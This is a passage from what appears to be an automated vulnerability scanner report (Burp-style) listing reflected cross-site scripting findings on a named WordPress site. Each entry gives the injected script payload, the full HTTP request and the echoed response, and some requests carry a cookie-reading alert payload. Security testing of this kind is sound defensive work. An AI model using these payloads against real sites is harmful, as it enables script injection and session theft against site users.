X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:21:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/wp-followme64678\"><script>alert(1)</script>1b810eecd7d/flash/wp_followme.swf" type="hidden" />
...[SNIP]...

1.189. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/wp-followme/flash/wp_followme.swf

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b8a"><script>alert(1)</script>bf9f4fc53b was submitted in the REST URL parameter 4. This input was echoed as f3b8a\"><script>alert(1)</script>bf9f4fc53b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-followme/flashf3b8a"><script>alert(1)</script>bf9f4fc53b/wp_followme.swf HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:21:04 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:21:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/wp-followme/flashf3b8a\"><script>alert(1)</script>bf9f4fc53b/wp_followme.swf" type="hidden" />
...[SNIP]...

1.190. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/wp-followme/flash/wp_followme.swf

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2ce5"><script>alert(1)</script>28fd4a0ed78 was submitted in the REST URL parameter 5. This input was echoed as c2ce5\"><script>alert(1)</script>28fd4a0ed78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-followme/flash/wp_followme.swfc2ce5"><script>alert(1)</script>28fd4a0ed78 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:21:09 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:21:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swfc2ce5\"><script>alert(1)</script>28fd4a0ed78" type="hidden" />
...[SNIP]...

1.191. http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/wp-followme/flash/wp_followme.swf

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87f3"><script>alert(1)</script>10e5d12dd72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a87f3\"><script>alert(1)</script>10e5d12dd72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-followme/flash/wp_followme.swf?a87f3"><script>alert(1)</script>10e5d12dd72=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.1.10.1296503863

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:20:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/wp-followme/flash/wp_followme.swf?a87f3\"><script>alert(1)</script>10e5d12dd72=1" type="hidden" />
...[SNIP]...

1.192. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8e07"><script>alert(1)</script>560c779c807 was submitted in the REST URL parameter 1. This input was echoed as f8e07\"><script>alert(1)</script>560c779c807 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentf8e07"><script>alert(1)</script>560c779c807/themes/rt_mynxx_wp/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentf8e07\"><script>alert(1)</script>560c779c807/themes/rt_mynxx_wp/css/light.css" type="hidden" />
...[SNIP]...

1.193. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38594"><script>alert(1)</script>1d9606001d8 was submitted in the REST URL parameter 2. This input was echoed as 38594\"><script>alert(1)</script>1d9606001d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes38594"><script>alert(1)</script>1d9606001d8/rt_mynxx_wp/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes38594\"><script>alert(1)</script>1d9606001d8/rt_mynxx_wp/css/light.css" type="hidden" />
...[SNIP]...

1.194. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f395"><script>alert(1)</script>7a4b1d2f5e3 was submitted in the REST URL parameter 3. This input was echoed as 6f395\"><script>alert(1)</script>7a4b1d2f5e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp6f395"><script>alert(1)</script>7a4b1d2f5e3/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp6f395\"><script>alert(1)</script>7a4b1d2f5e3/css/light.css" type="hidden" />
...[SNIP]...

1.195. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f787"><script>alert(1)</script>d9c7a8e343b was submitted in the REST URL parameter 4. This input was echoed as 9f787\"><script>alert(1)</script>d9c7a8e343b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css9f787"><script>alert(1)</script>d9c7a8e343b/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:28 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css9f787\"><script>alert(1)</script>d9c7a8e343b/light.css" type="hidden" />
...[SNIP]...

1.196. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c386"><script>alert(1)</script>a3110606fc was submitted in the REST URL parameter 5. This input was echoed as 2c386\"><script>alert(1)</script>a3110606fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/light.css2c386"><script>alert(1)</script>a3110606fc HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:42 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css2c386\"><script>alert(1)</script>a3110606fc" type="hidden" />
...[SNIP]...

1.197. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eac4c"><script>alert(1)</script>ba25096ea8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eac4c\"><script>alert(1)</script>ba25096ea8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/light.css?eac4c"><script>alert(1)</script>ba25096ea8d=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:41 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css?eac4c\"><script>alert(1)</script>ba25096ea8d=1" type="hidden" />
...[SNIP]...

1.198. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4c4e"><script>alert(1)</script>67f90b47a97 was submitted in the REST URL parameter 1. This input was echoed as b4c4e\"><script>alert(1)</script>67f90b47a97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentb4c4e"><script>alert(1)</script>67f90b47a97/themes/rt_mynxx_wp/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentb4c4e\"><script>alert(1)</script>67f90b47a97/themes/rt_mynxx_wp/css/rokmoomenu.css" type="hidden" />
...[SNIP]...

1.199. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bcf4"><script>alert(1)</script>f3abb3d23ef was submitted in the REST URL parameter 2. This input was echoed as 2bcf4\"><script>alert(1)</script>f3abb3d23ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes2bcf4"><script>alert(1)</script>f3abb3d23ef/rt_mynxx_wp/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes2bcf4\"><script>alert(1)</script>f3abb3d23ef/rt_mynxx_wp/css/rokmoomenu.css" type="hidden" />
...[SNIP]...

1.200. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb741"><script>alert(1)</script>99ae03579d0 was submitted in the REST URL parameter 3. This input was echoed as eb741\"><script>alert(1)</script>99ae03579d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wpeb741"><script>alert(1)</script>99ae03579d0/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
